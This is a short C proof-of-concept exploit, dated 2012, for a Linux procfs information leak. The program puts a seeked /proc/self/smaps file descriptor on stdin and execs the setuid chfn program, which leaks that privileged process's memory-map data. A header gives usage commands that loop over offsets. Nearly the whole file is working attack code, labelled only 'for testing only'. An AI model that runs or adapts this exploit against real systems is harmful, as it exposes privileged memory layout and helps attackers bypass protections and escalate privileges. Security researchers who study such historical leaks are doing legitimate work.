/*
* Procfs (2) leak
* Author: Djalal - tixxdz
*
* Leak setuid proc files: smaps (maps ... ?)
*
* This will leak info of 'chfn' setuid program
* We can expand it to leak proc files of any process.
*
* To test is set your user password to:
* "Locked:                0 kB"
*
* Run with:
* $ for i in $(seq 460 480); \
*   do ./procfs_leak_2 /usr/bin/chfn /proc/self/smaps $i; done
*
* For testing only.
*
* 02/02/2012
*/

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int leak(char *prog, char *file, off64_t offset)
{
        int ret = -1;
        char *argv[]={prog, NULL};
        char target[512];
        pid_t pid = getpid();

        memset(target, 0, sizeof(target));
        snprintf(target, sizeof(target), "/proc/%d/%s", pid, file);
        int fd_leak = open(file, O_RDONLY);
        if (fd_leak == -1) {
                perror("open");
                return ret;
        }
        dup2(fd_leak, STDIN_FILENO);
      
        if (lseek64(STDIN_FILENO, offset, SEEK_SET) == (off64_t) -1) {
        	perror("lseek64");
        	return ret;
        }
        sleep(1);
        execv(argv[0], argv);
        perror("execv");

        return ret;
}

int main(int argc, char **argv)
{
        char *program = NULL;
        char *proc_file = NULL;
        off64_t offset = 0;

        if (argc < 4) {
                printf("%s  <program>  <proc_file>  <offset>\n"
                       "    <program>: path of a setuid program.\n"
                       "    <proc_file>: file to read.\n"
                       "    <offset>: Offset.\n",argv[0]);
                return -1;
        }
        
        program = argv[1];
        proc_file = argv[2];
        offset = (off64_t) atol(argv[3]);

        return leak(program, proc_file, offset);
}